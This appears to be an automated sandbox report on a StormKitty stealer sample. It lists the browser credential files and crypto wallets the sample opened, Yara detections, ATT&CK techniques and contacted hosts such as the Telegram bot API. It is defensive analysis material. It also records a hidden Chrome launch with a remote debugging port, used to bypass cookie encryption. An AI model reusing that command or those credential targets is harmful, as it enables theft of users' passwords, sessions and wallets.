Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7f0194d6-62d6-4174-a7ed-55ebc13aacb4	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addons.json	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\2b167346-5f76-4c00-8f97-19cee0df0fba	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore.jsonlz4	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6260e81e-5ef5-4137-a0a5-7930ea6f0a75	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\background-update	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\edd11145-a3b3-4ebf-ba7b-14b7ec08f19f	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addonStartup.json.lz4	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\state.json	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\3be89113-af2b-4b48-9c47-40ac1156f7a2	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\			Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\			Jump to behavior

Source: Yara match	File source: StormKittyXZeroTrace.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.900495812.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1085360249.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: StormKittyXZeroTrace.exe.bin.exe PID: 7108, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

Yara detected Generic Stealer

Source: Yara match	File source: 00000000.00000002.1094533087.000000000991C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: StormKittyXZeroTrace.exe.bin.exe PID: 7108, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: StormKittyXZeroTrace.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.900495812.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: StormKittyXZeroTrace.exe.bin.exe PID: 7108, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: StormKittyXZeroTrace.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.900495812.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1085360249.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: StormKittyXZeroTrace.exe.bin.exe PID: 7108, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	231 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	1 OS Credential Dumping	241 Security Software Discovery	Remote Services	1 Screen Capture	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Extra Window Memory Injection	251 Virtualization/Sandbox Evasion	Security Account Manager	251 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	3 Data from Local System	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Obfuscated Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	125 System Information Discovery	VNC	GUI Input Capture	4 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
StormKittyXZeroTrace.exe.bin.exe	62%	Virustotal		Browse
StormKittyXZeroTrace.exe.bin.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.DataStealer
StormKittyXZeroTrace.exe.bin.exe	100%	Avira	HEUR/AGEN.1307370

Source	Detection	Scanner	Label
http://unisolated.invalid/	0%	Avira URL Cloud	safe
https://MD8.mozilla.org/1/m	0%	Avira URL Cloud	safe
http://get.geojs.iod	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ipinfo.io	34.117.59.81	true	false	high
get.geojs.io	104.26.1.100	true	false	high
www.google.com	142.250.185.196	true	false	high
api.telegram.org	149.154.167.220	true	false	high
41.140.13.0.in-addr.arpa	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
https://ipinfo.io/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://mail.google.com/mail/?usp=installed_webapp	chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://goto.google.com/sme-bugs2e	chrome.exe, 0000000A.00000002.1070464744.000016F000624000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011385045.000016F000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1013106889.000016F000622000.00000004.00001000.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	tmp1B07.tmp.dat.0.dr	false		high
https://samplicio.us	chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	false		high
https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing	chrome.exe, 0000000A.00000002.1071887801.000016F400480000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	StormKittyXZeroTrace.exe.bin.exe	false		high
https://support.google.com/chrome/answer/6098869	chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	false		high
https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b	chrome.exe, 0000000A.00000002.1073203488.000016F400804000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/document/J	chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone	chrome.exe, 0000000A.00000002.1074859811.000016F400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075483713.000016F400EC4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074100077.000016F400A04000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.youtube.com/:	chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://beaconmax.com	chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	false		high
https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/	chrome.exe, 0000000A.00000002.1073720066.000016F400948000.00000004.00001000.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/:	chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.google.com/chrome?p=desktop_tab_groups	chrome.exe, 0000000A.00000002.1072469414.000016F400604000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	chrome.exe, 0000000A.00000002.1058317906.000001CF861F7000.00000004.10000000.00040000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075278942.000016F400E04000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1078188119.000016F4017D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075176475.000016F400DA4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	false		high
http://dns-tunnel-check.googlezip.net/connect	chrome.exe, 0000000A.00000002.1075919363.000016F401078000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/document/:	chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://adtrafficquality.google	chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	false		high
https://mail.google.com/chat/download?usp=chrome_default	chrome.exe, 0000000A.00000002.1072469414.000016F400604000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075086091.000016F400D88000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/tools/feedback/chrome/__submit	chrome.exe, 0000000A.00000002.1071850764.000016F40046C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://mail.google.com/chat/	chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075278942.000016F400E04000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074007320.000016F4009D0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075613974.000016F400F64000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com	chrome.exe, 0000000A.00000002.1071381146.000016F4002D8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://weibo.com/	StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009DF9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/J	chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://get.geojs.io	StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009E3A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://calendar.google.com	chrome.exe, 0000000A.00000002.1072310952.000016F400590000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1077663173.000016F401524000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1077687307.000016F401534000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1032028147.000016F401554000.00000004.00001000.00020000.00000000.sdmp	false		high
https://metro.co.uk	chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/LimerBoy/StormKitty	StormKittyXZeroTrace.exe.bin.exe	false		high
http://unisolated.invalid/	chrome.exe, 0000000A.00000002.1075176475.000016F400DA4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mail.google.com/chat/:	chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075086091.000016F400D88000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl	chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	false		high
https://www.google.com/chrome/tips/	chrome.exe, 0000000A.00000002.1074547401.000016F400BA4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074859811.000016F400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1077759790.000016F4015B4000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.msn.com	StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009DB5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/?lfhs=2	chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://api.telegram.orgd	StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009A8D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)	chrome.exe, 0000000A.00000002.1073633886.000016F400910000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1073589942.000016F4008F4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1070811065.000016F4000DC000.00000004.00001000.00020000.00000000.sdmp	false		high
https://audienceproject.com	chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.youtube.com/s/notifications/manifest/cr_install.html	chrome.exe, 0000000A.00000003.1025895513.000016F400778000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22	chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.0000000003301000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	tmpB2C2.tmp.dat.0.dr	false		high
https://www.youtube.com/?feature=ytca	chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/browser-tools/	chrome.exe, 0000000A.00000002.1073791910.000016F400980000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.youtube.com/J	chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/forms/u/0/create?usp=chrome_actions	chrome.exe, 0000000A.00000002.1074859811.000016F400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074375347.000016F400B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076064219.000016F4010D8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/document/u/0/create?usp=chrome_actions	chrome.exe, 0000000A.00000002.1074859811.000016F400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074375347.000016F400B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076064219.000016F4010D8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA	chrome.exe, 0000000A.00000002.1076491067.000016F4011E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074309332.000016F400ACC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074700686.000016F400C1C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.google.com/chromebook?p=app_intent	chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	false		high
https://chromewebstore.google.com/category/themes	chrome.exe, 0000000A.00000002.1073791910.000016F400980000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	chrome.exe, 0000000A.00000003.1032666164.000016F4013E8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://atomex.net	chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	false		high
https://apex-football.com	chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en&category=theme81https://myactivity.google.com/myactivity/?u	chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmp1B07.tmp.dat.0.dr	false		high
https://gunosy.com	chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/answer/96817	chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	false		high
https://myaccount.google.com/shielded-email?utm_source=chrome2B	chrome.exe, 0000000A.00000002.1070464744.000016F000624000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011385045.000016F000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1013106889.000016F000622000.00000004.00001000.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k	chrome.exe, 0000000A.00000002.1073144667.000016F4007D0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	tmpB2C2.tmp.dat.0.dr	false		high
https://www.google.com/chrome/#safe	chrome.exe, 0000000A.00000002.1073720066.000016F400948000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/browser-features/	chrome.exe, 0000000A.00000002.1073791910.000016F400980000.00000004.00001000.00020000.00000000.sdmp	false		high
https://MD8.mozilla.org/1/m	StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009DB5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 0000000A.00000002.1074859811.000016F400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074375347.000016F400B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076064219.000016F4010D8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 0000000A.00000002.1074859811.000016F400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075483713.000016F400EC4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074100077.000016F400A04000.00000004.00001000.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k	chrome.exe, 0000000A.00000002.1073144667.000016F4007D0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://postrelease.com	chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl	chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	false		high
https://get.geojs.io/v1/ip/geo.json)root	StormKittyXZeroTrace.exe.bin.exe	false		high
https://google-ohttp-relay-join.fastly-edge.com/2J	chrome.exe, 0000000A.00000002.1070464744.000016F000624000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011385045.000016F000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1013106889.000016F000622000.00000004.00001000.00020000.00000000.sdmp	false		high
https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b	chrome.exe, 0000000A.00000002.1073203488.000016F400804000.00000004.00001000.00020000.00000000.sdmp	false		high
https://m.google.com/devicemanagement/data/api	chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 0000000A.00000002.1074859811.000016F400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074375347.000016F400B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076064219.000016F4010D8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/	chrome.exe, 0000000A.00000002.1071107853.000016F4001AC000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/category/extensions	chrome.exe, 0000000A.00000002.1073791910.000016F400980000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/LimerBoy/StormKitty0&	StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.google.com/chat/download?usp=chrome_defaultle	chrome.exe, 0000000A.00000002.1072469414.000016F400604000.00000004.00001000.00020000.00000000.sdmp	false		high
https://get.geojs.io/v1/ip/geoT	StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009E3A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009A8D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/	chrome.exe, 0000000A.00000003.1032666164.000016F4013E8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1073589942.000016F4008F4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076441291.000016F4011C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076702677.000016F40128C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://clients4.google.com/chrome-sync	chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	tmp1B07.tmp.dat.0.dr	false		high
http://google.com/	chrome.exe, 0000000A.00000002.1070691311.000016F400086000.00000004.00001000.00020000.00000000.sdmp	false		high
https://creative-serving.com	chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.telegram.org	StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009A8D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://csp.withgoogle.com/csp/clientupdate-aus/1	chrome.exe, 0000000A.00000002.1056508623.000001CF83EDD000.00000004.10000000.00040000.00000000.sdmp	false		high
https://mail.google.com/mail/installwebapp?usp=chrome_default	chrome.exe, 0000000A.00000003.1025895513.000016F400778000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/J	chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://get.geojs.iod	StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009E3A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.unicode.org/copyright.html	chrome.exe, 0000000A.00000002.1051881974.000001CF80010000.00000002.00000001.00040000.0000000E.sdmp	false		high
https://drive.google.com/drive/installwebapp?usp=chrome_default	chrome.exe, 0000000A.00000003.1025895513.000016F400778000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 0000000A.00000003.1026330903.000016F40141C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1077202266.000016F40141C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076406692.000016F4011A4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1032666164.000016F4013E8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.0000000004499000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.00000000044BB000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.00000000044DD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075110765.000016F400D9F000.00000004.00001000.00020000.00000000.sdmp, tmp1B07.tmp.dat.0.dr	false		high
https://docs.google.com/document/installwebapp?usp=chrome_default	chrome.exe, 0000000A.00000003.1025895513.000016F400778000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/:	chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	false		high
